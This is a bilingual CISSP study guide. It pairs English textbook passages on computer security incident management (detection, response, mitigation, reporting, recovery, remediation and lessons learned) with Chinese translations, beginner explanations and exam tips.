安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

NIST documents, including SP 800-61, can be accessed from the NIST publications page: http://csrc.nist.gov/Publications. In the context of incident management, an incident is referring to a computer security incident. However, you'll often see it listed as just an incident. For example, within the CISSP Security Operations domain, the “Conduct incident management” objective is clearly referring to computer security incidents. In this chapter, any reference to an incident is to a computer security incident.

Organizations handle some incidents, such as weather events or natural disasters, using other methods, such as a business continuity plan (covered in Chapter 3, “Business Continuity Planning”) or a disaster recovery plan (covered in Chapter 18, “Disaster Recovery Planning”). Organizations commonly define the meaning of a computer security incident within their security policy or incident management plans.

The definition is usually one or two sentences long and includes examples of common events that the organization classifies as security incidents, such as the following: Any attempted network intrusion Any attempted denial-of-service attack Any detection of malicious software Any unauthorized access of data Any violation of security policies Incident Management Steps Effective incident management is handled in several steps or phases. Figure 17.1 shows the seven steps involved in incident management as outlined in the CISSP objectives.

It's important to realize that incident management is an ongoing activity, and the results of the lessons learned stage are used to improve detection methods or help prevent a repeated incident. The following sections describe these steps in more depth. NIST

中文直译 / 整理

文档,包括SP 800‑61,可通过NIST出版物页面访问: http://csrc.nist.gov/Publications。 在事件管理的背景下,事件指的是计算机安全事件。 然而,你通常会看到它仅 被列为事件。 例如,在CISSP安全运营领域中,'执行事件管理'这一目标明确指 的是计算机安全事件。 在本章中,任何对事件的提及均指计算机安全事件。 组织会使用其他 方法处理某些事件,例如天气事件或自然灾害,如业务连续性计划(见第 3章,“业务连续性规划”)或灾难恢复计划(见第18章,“灾难恢复规划”)。 组织通常在其安全政策或事件管理计划中定义计算机安全事件的含义。 该定义 通常为一到两句话,包含组织归类为安全事件的常见事件示例,例如: 任何尝试的网络入侵 任何尝试的拒绝服务攻击 任何恶意软件的检测 任何未经授权的数据访问 任何违反安全策略的行为 事件管理步骤 有效的事件管理分为若干步骤或阶段。 图17.1展示了CISSP目标中概述的事件管 理的七个步骤。 重要的是要认识到,事件管理是一个持续的活动,从经验总结 阶段获得的结果可用于改进检测方法或帮助防止类似事件再次发生。 以下各节 将更深入地描述这些步骤。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
学习单元 04 / PDF P1141

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

You may run across documentation that lists these steps differently. For example, NIST SP 800-61, an excellent resource for learning more about incident handling, identifies the following four phases in the incident response life cycle: 1) preparation, 2) detection and analysis, 3) containment, eradication, and recovery, and 4) post-incident recovery. Still, no matter how documentation lists the steps, it contains many of the same elements and has the same goal of effectively managing incident response. The key point is that you can expect to see the steps shown in Figure 17.1 on the live CISSP exam.

FIGURE 17.1 Incident management It's important to stress that incident management does not include a counterattack against the attacker. Launching attacks on others is counterproductive and often illegal. If an employee can identify the attacker and launch an attack, it will likely result in an escalation of the attacker's actions. In other words, the attacker may now consider it personal and regularly launch grudge attacks. In addition, it's likely that the attacker is hiding behind one or more innocent victims. Attackers often use spoofing methods to hide their identity or launch attacks by bots in a botnet. Counterattacks may be against an innocent victim rather than an attacker.

Detection IT environments include multiple methods of detecting potential incidents. The following list identifies many of the common methods used to detect potential incidents. It also includes notes on how these methods report the incidents: Intrusion detection and prevention systems (described later in this chapter) send alerts to administrators when they detect a potential incident.

中文直译 / 整理

您可能会遇到将这些步骤列出方式不同的文档。 例如,NIST SP 800‑61 是一份了解事件处理的优秀资源,它将事件响应生命周期划分为以下 四个阶段:1)准备,2)检测与分析,3)遏制、消除与恢复,4)事后恢复。 然而,无论文档如何列出这些步骤,它们都包含许多相同的要素,并具有相 同的目标,即有效管理事件响应。 关键点在于,您在CISSP实际考试中可能 会看到图17.1中所示的步骤。 图 17.1 事件管理 必须强调的是,事件管理不包括对攻击者的反击。 对他人发动攻击是适得其 反的,且常常是非法的。 如果员工能够识别攻击者并发动攻击,很可能会导 致攻击者行为升级。 换句话说,攻击者可能会将此事视为个人恩怨,并定期 发动报复性攻击。 此外,攻击者很可能隐藏在一名或多名无辜受害者之后。 攻击者通常使用欺骗方法隐藏其身份,或通过僵尸网络中的机器人发动攻击。 反击的对象可能是无辜的受害者,而非真正的攻击者。 检测 IT 环境包含多种检测潜在事件的方法。 以下列表列出了用于检测潜在事件的 许多常见方法,并说明了这些方法如何报告事件: 入侵检测和预防系统(本章稍后将介绍)在检测到潜在事件时会向 管理员发送警报。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

身份:身份是主体在系统中的标识。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

遏制:遏制先阻止事件继续扩大,不急着完全修复。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

事件响应中先控制影响,再根除原因。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
学习单元 05 / PDF P1142

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Anti-malware software will often display a pop-up window to indicate when it detects malware. Many automated tools regularly scan audit logs looking for predefined events, such as the use of special privileges. When they detect specific events, they typically send an alert to administrators. End users sometimes detect irregular activity and contact technicians or administrators for help. When users report events, such as the inability to access a network resource or update a system, it alerts IT personnel about a potential incident. Notice that just because an IT professional receives an alert from an automated tool or a user complaint, this doesn't always mean an incident has occurred.

Intrusion detection and prevention systems often give false alarms, and end users are prone to simple user errors. IT personnel investigate these events to determine whether they are incidents. Many IT professionals are classified as first responders for incidents. They are the first ones on the scene and know how to differentiate typical IT problems from security incidents. They are similar to medical first responders, who have outstanding skills and abilities to provide medical assistance at accident scenes and help get the patients to medical facilities when necessary.

The medical first responders have specific training to help them determine the difference between minor and major injuries. Further, they know what to do when they come across a major injury. Similarly, IT professionals need specific training to determine the difference between a typical problem that needs troubleshooting and a security incident that they need to escalate. After investigating an event and determining it is a security incident, IT personnel move to the next step: response. In many cases, the individual doing the initial investigation will escalate the incident to bring in other IT professionals to respond.

Response After detecting and verifying an incident, the next step is response. The response varies depending on the severity of the incident. Many organizations have a designated incident response team—sometimes called a cyber incident response team (CIRT) or computer security incident response team (CSIRT). The organization activates the team during a major security incident but does

中文直译 / 整理

反恶意软件通常会显示一个弹出窗口,以指示其检测到恶意软件时。 许多自动化工具会定期扫描审计日志,以查找预定义的 事件,例如使用特殊权限。 当它们检测到特定事件时,通常会向管理员发送警 报。 最终用户有时会发现异常活动,并联系技术人员或管理员寻求帮助。 当用 户报告事件时,例如无法访问网络资源或更新系统,这会提醒IT人员注意 潜在事件。 请注意,即使IT专业人员从自动化工具或用户投诉中收到警报,也不一定意味 着事件已经发生。 入侵检测和预防系统经常产生误报,而最终用户也容易犯简 单的操作错误。 IT人员会调查这些事件,以确定它们是否为真实事件。 许多IT专业人员被归类为事件的第一响应者。 他们是首批到达现场的人,能 够区分典型的IT问题与安全事件。 他们类似于医疗急救人员,具备出色的技 能,能够在事故现场提供医疗救助,并在必要时帮助患者送往医疗机构。 医 疗急救人员接受过专门培训,以区分轻伤与重伤,并且知道在遇到重伤时该 如何应对。 同样,IT专业人员也需要接受专门培训,以区分需要故障排除的 普通问题和需要上报的安全事件。 在调查事件并确定其为安全事件后,IT人员进入下一步:响应。

在许多情况 下,进行初步调查的人员会升级该事件,以召集其他IT专业人员进行响应。 响应 在检测并核实事件后,下一步是响应。 响应措施根据事件的严重程度而有所不 同。 许多组织都设有专门的事件响应团队——有时称为网络安全事件响应团队 (CIRT)或计算机安全事件响应团队(CSIRT)。 在发生重大安全事件时,组 织会启动该团队,但

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

审计:审计检查控制是否存在、是否有效、是否符合要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 06 / PDF P1143

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

not typically activate the team for minor incidents. A formal incident response plan documents who would activate the team and under what conditions. Team members are trained on incident response and the organization's incident response plan. Typically, team members investigate the incident, contain and assess the damage, collect evidence, report the incident, and perform recovery procedures. They also participate in the remediation and lessons learned stages, and help with root cause analysis. The more quickly an organization can respond to an incident, the better chance they have at limiting the damage. If an incident continues for hours or days, the damage is likely to be greater.

For example, an attacker may be trying to access a customer database. A quick response can prevent the attacker from obtaining any meaningful data. However, if given continued unobstructed access to the database for several hours or days, the attacker may be able to get a copy of the entire database. After an investigation is over, management may decide to prosecute responsible individuals. Because of this, it's important to protect all data as evidence during the investigation. Chapter 19, “Investigations and Ethics,” covers incident handling and response in the context of supporting investigations.

If any possibility of prosecution exists, team members take extra steps to protect the evidence. This ensures that the evidence can be used in legal procedures. Computers should not be turned off when containing an incident. Temporary files and data in volatile random access memory (RAM) will be lost if the computer is powered down. Forensics experts have tools they can use to retrieve data in temporary files and volatile RAM as long as the system is kept powered on. However, this evidence is lost if someone turns the computer off or unplugs it. Mitigation Mitigation steps attempt to contain an incident.

One of the primary goals of effective incident management is to limit the effect or scope of an incident. For example, if an infected computer is sending data out its network adapter, a technician can disable the network adapter or disconnect the cable to the

中文直译 / 整理

通常不会为轻微事件启动该团队。 一份正式的事件响应计划会明确谁在 何种条件下启动该团队。 团队成员接受了事件响应和组织事件响应计划的培训。 通常,团队成员会调 查事件、控制并评估损害、收集证据、报告事件并执行恢复程序。 他们还参 与补救和经验总结阶段,并协助进行根本原因分析。 组织对事件的响应越迅速,就越有可能限制损害。 如果事件持续数小时或数天, 损害可能会更加严重。 例如,攻击者可能正在尝试访问客户数据库。 快速响应 可以防止攻击者获取任何有意义的数据。 然而,如果攻击者在数小时或数天内 持续获得无阻碍的数据库访问权限,他们可能能够获取整个数据库的副本。 调查结束后,管理层可能会决定起诉相关责任人。 因此,在调查期间保护所有 数据作为证据至关重要。 第19章“调查与伦理”介绍了在支持调查背景下事件 处理与响应的内容。 如果存在任何起诉的可能性,团队成员将采取额外措施保 护证据。 这确保了证据可用于法律程序。 发生事件时,计算机不应关闭。 如果计算机断电,临时文件和易失性 随机存取存储器(RAM)中的数据将丢失。 取证专家拥有工具,只要系统 保持通电,就可以检索临时文件和易失性RAM中的数据。

然而,如果有人 关闭计算机或拔掉电源,这些证据就会丢失。 缓解措施 缓解措施旨在控制事件。 有效事件管理的主要目标之一是限制事件的影响或范 围。 例如,如果一台受感染的计算机通过其网络适配器向外发送数据,技术人 员可以禁用网络适配器或断开其电缆以

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

程序:程序是一步一步怎么做。

事件响应:事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。

职业伦理:职业伦理要求安全人员保护公众、诚实负责、合法合规。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

准备、检测、遏制、根除、恢复、经验教训是常见顺序。

ISC2 伦理题通常优先保护社会、公共利益和合法性。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
程序 程序是一步一步怎么做。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
职业伦理 职业伦理要求安全人员保护公众、诚实负责、合法合规。
学习单元 07 / PDF P1144

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

computer. Sometimes containment involves disconnecting a network from other networks to contain the problem within a single network. When the problem is isolated, security personnel can address it without worrying about it spreading to the rest of the network. In some cases, responders take steps to mitigate the incident, but without letting the attacker know that the attack has been detected. This allows security personnel to monitor the attacker's activities and determine the scope of the attack. Reporting Reporting refers to reporting an incident within the organization and to organizations and individuals outside the organization.

Although there's no need to report a minor malware infection to a company's CEO, upper-level management does need to know about serious security breaches. As an example, the medical debt collections firm R1 RCM was hit by a ransomware attack in August 2020. R1 RCM has partnered with over 750 healthcare companies, and they held personal data on millions of patients. This included Social Security numbers, medical diagnostic data, and financial data. The attack reportedly occurred about a week before the company was planning to release its quarterly financial reports.

Although R1 RCM didn't provide internal communications details, you can bet someone notified the CEO soon after the attack was detected. Organizations often have a legal requirement to report some incidents outside of the organization. Most countries (and many smaller jurisdictions, including states and cities) have enacted regulatory compliance laws to govern security breaches, particularly as they apply to sensitive data retained within information systems. These laws typically include a requirement to report the incident, especially if the security breach exposed customer data.

Laws differ from locale to locale, but all seek to protect the privacy of individual records and information, to protect consumer identities, and to establish standards for financial practice and corporate governance. Every organization has a responsibility to know what laws apply to it and to abide by those laws. Many jurisdictions have specific laws governing the protection of personally identifiable information (PII). If a data breach exposes PII, the organization must report it. Different laws have different reporting requirements, but most include a requirement to notify individuals affected by the incident. In other

中文直译 / 整理

计算机。 有时,隔离涉及将一个网络与其他网络断开,以将问题限制在单个网 络内。 当问题被隔离后,安全人员可以在无需担心问题扩散到网络其余部分的 情况下对其进行处理。 在某些情况下,响应人员会采取措施减轻事件影响,但不会让攻击者知道 攻击已被发现。 这使安全人员能够监控攻击者的活动,并确定攻击的范围。 报告 报告是指在组织内部以及向组织外部的机构和个人报告事件。 虽然无需向公 司首席执行官报告轻微的恶意软件感染,但高级管理层必须了解严重的安全 漏洞。 例如,2020年8月,医疗债务催收公司R1 RCM遭遇了勒索软件攻击。 R1 RCM与超过750家医疗公司合作,持有数百万患者的个人数据,包括社会保障 号码、医疗诊断数据和财务数据。 据报告,此次攻击发生在该公司计划发布季 度财务报告前约一周。 尽管R1 RCM未公布内部通信细节,但可以肯定的是, 攻击被发现后不久,有人通知了首席执行官。 组织通常有法律义务向组织外部报告某些事件。 大多数国家(以及许多较小的 司法管辖区,包括州和城市)已颁布监管合规法律,以规范安全漏洞,特别是 涉及信息系统中保存的敏感数据的情况。 这些法律通常要求报告事件,特别是 当安全漏洞暴露了客户数据时。

不同地区的法律有所不同,但所有法律都旨在 保护个人记录和信息的隐私、保护消费者身份,并建立财务实践和公司治理的 标准。 每个组织都有责任了解适用于自身的法律并遵守这些法律。 许多司法管辖区有专门的法律规范个人身份信息(PII)的保护。 如果数据泄露 导致PII暴露,组织必须报告此事。 不同法律有不同的报告要求,但大多数都包 括通知受事件影响的个人的要求。 在其他

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

标准:标准给出必须满足的最低要求。

身份:身份是主体在系统中的标识。

遏制:遏制先阻止事件继续扩大,不急着完全修复。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Minimum level、mandatory requirement 常对应 standard。

身份管理题要区分识别、认证、授权、审计。

事件响应中先控制影响,再根除原因。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
标准 标准给出必须满足的最低要求。
身份 身份是主体在系统中的标识。
遏制 遏制先阻止事件继续扩大,不急着完全修复。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 08 / PDF P1145

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

words, if an attack on a system resulted in an attacker gaining PII about you, the owners of the system have a responsibility to inform you of the attack and what data the attackers accessed. In response to serious security incidents, the organization should consider reporting the incident to official agencies. In the United States, this may mean notifying the Federal Bureau of Investigation (FBI), district attorney offices, and state and local law enforcement agencies. In Europe, organizations may report the incident to the International Criminal Police Organization (INTERPOL) or some other entity based on the incident and their location.

These agencies may assist in investigations, and the data they collect may help them prevent future attacks against other organizations. Organizations sometimes choose not to involve law enforcement to avoid negative publicity or an intrusive investigation. However, this is not an option if personal information is exposed. Additionally, some third-party standards, such as the Payment Card Industry Data Security Standard (PCI DSS), require organizations to report certain security incidents to law enforcement. Many incidents are not reported because they aren't recognized as incidents. This is often the result of inadequate training.

The obvious solution is to ensure that personnel have relevant training. Training should teach individuals how to recognize incidents, what to do in the initial response, and how to report an incident. Recovery The next step is to recover the system or return it to a fully functioning state. This step can be very simple for minor incidents and may only require a reboot. However, a major incident may require completely rebuilding a system. Rebuilding the system includes restoring all data from the most recent backup. When a compromised system is rebuilt from scratch, it's important to ensure it is configured properly and is at least as secure as it was before the incident.

If an organization has effective configuration management and change management programs, these programs will provide the necessary

中文直译 / 整理

情况下,如果对系统的攻击导致攻击者获取了关于您的PII,系统的所有者有责 任告知您此次攻击以及攻击者访问了哪些数据。 针对严重的安全事件,组织应考虑向官方机构报告该事件。 在美国,这可能 意味着通知联邦调查局(FBI)、地区检察官办公室以及州和地方执法机构。 在欧洲, 组织可根据事件性质及其所在地,向国际刑警组织(INTERPOL)或其他相 关机构报告该事件。 这些机构可能协助调查,其收集的数据有助于防止未来针 对其他组织的攻击。 组织有时选择不涉及执法机构,以避免负面舆论或侵入性调查。 然而, 如果个人身份信息遭到泄露,这种做法则不可行。 此外,一些第三方标准, 例如支付卡行业数据安全标准(PCI DSS),要求组织向执法机构报告特 定的安全事件。 许多事件未被报告,是因为未被识别为事件,这通常是由 于培训不足所致。 显而易见的解决方案是确保人员接受相关培训。 培训应 教导人员如何识别事件、在初步响应中应采取哪些措施,以及如何报告事 件。 恢复 下一步是恢复系统或将其恢复到完全正常运行的状态。 对于轻微事件,此步骤 可能非常简单,只需重启即可。 然而,重大事件可能需要完全重建系统。 重建 系统包括从最新备份中恢复所有数据。

当一个被攻陷的系统从头重建时,确保其配置正确且至少与事件发生前一样安 全非常重要。 如果组织拥有有效的配置管理和变更管理程序,这些程序将提供 必要的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 09 / PDF P1146

第 1146 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

documentation to ensure the rebuilt systems are configured properly. Things to double-check include the following: Access control lists (ACLs), which include firewall or router rules Services and protocols, ensuring that unneeded services and protocols are disabled or removed Patches, ensuring that all up-to-date patches are installed User accounts, ensuring that they have changed from their default configurations Compromises, ensuring that any known compromises have been reversed In some cases, an attacker may have installed malicious code on a system during an attack. This attack may not be apparent without a detailed inspection of the system.

The most secure method of restoring a system after an incident is completely rebuilding the system from scratch. If investigators suspect that an attacker may have modified code on the system, rebuilding a system may be a good option. Remediation In the remediation stage, personnel look at the incident, identify what allowed it to occur, and then implement methods to prevent it from happening again. This step includes performing a root cause analysis. A root cause analysis examines the incident to determine what allowed it to happen.

For example, if attackers successfully accessed a database through a website, personnel would examine all the system elements to determine what allowed the attackers to succeed. If the root cause analysis identifies a vulnerability that can be mitigated, this stage will recommend a change. It could be that the web server didn't have up-to-date patches, allowing the attackers to gain remote control of the server. Remediation steps might include implementing a patch management program. Perhaps the website application wasn't using adequate input validation techniques, allowing a successful SQL injection attack. Remediation would involve updating the

中文直译 / 整理

文档,以确保重建的系统配置正确。 需要重点检查的事项包括以下内容: 访问控制列表(ACL),包括防火墙或路由器规则 服务和协议,确保禁用或移除不必要的服务和协议 补丁,确保安装了所有最新的补丁 用户账户,确保其已更改默认配置 入侵事件,确保已修复所有已知的入侵 在某些情况下,攻击者可能在攻击期间在系统上安装了恶意代码。 这种 攻击在未经详细检查系统的情况下可能无法察觉。 在事件发生后恢复系统的 最安全方法是从头开始完全重建系统。 如果调查人员怀疑攻击者可能修改了 系统上的代码,则重建系统可能是一个不错的选择。 补救 在补救阶段,人员会审查事件,识别导致事件发生的原因,然后实施方 法以防止其再次发生。 此步骤包括执行根本原因分析。 根本原因分析通过检查事件来确定导致其发生的原因。 例如,如果攻击者通过 网站成功访问了数据库,人员将检查所有系统元素,以确定是什么允许攻击者 得逞。 如果根本原因分析识别出可缓解的漏洞,此阶段将建议进行更改。 可能是由于Web服务器未应用最新的补丁,导致攻击者获得了对服务器的远 程控制权。 修复措施可能包括实施补丁管理程序。 也许网站应用程序未使用 充分的输入验证技术,从而导致SQL注入攻击成功。

修复措施包括更新

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

注入攻击:注入攻击把恶意输入当命令或查询执行。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1146 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 10 / PDF P1147

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

application to include input validation. Maybe the database is located on the web server instead of in a backend database server. Remediation might include moving the database to a server behind an additional firewall. Lessons Learned During the lessons learned stage, personnel examine the incident and the response to see if there are any lessons to be learned. The incident response team will be involved in this stage, but other employees who are knowledgeable about the incident will also participate. While examining the response to the incident, personnel look for any areas where they can improve their response.

For example, if the response team took a long time to contain the incident, the examination tries to determine why. It might be that personnel don't have adequate training or the knowledge and expertise to respond effectively. They may not have recognized the incident when they received the first notification, allowing an attack to continue longer than necessary. First responders may not have recognized the need to protect evidence and inadvertently corrupted it during the response. Remember, the output of this stage can be fed back to the detection stage of incident management.

